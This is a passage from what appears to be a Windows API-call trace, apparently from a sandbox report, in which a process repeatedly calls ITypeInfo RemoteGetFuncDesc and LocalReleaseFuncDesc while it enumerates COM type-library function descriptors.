ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.162] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.162] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x80, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x81, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x82, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x83, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x84, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x85, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x86, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x87, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x88, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x89, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x90, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x91, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x92, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.163] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.163] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x93, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x94, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x95, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x96, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x97, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x98, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x99, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.164] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.164] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaa, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xab, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xac, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xad, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xae, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xba, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.165] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.165] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbc, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbd, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbe, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc5, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc6, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc7, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc8, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc9, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xca, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcb, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcc, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcd, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xce, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcf, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.166] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd0, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.166] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd1, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd2, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd3, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.167] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.167] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd4, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: 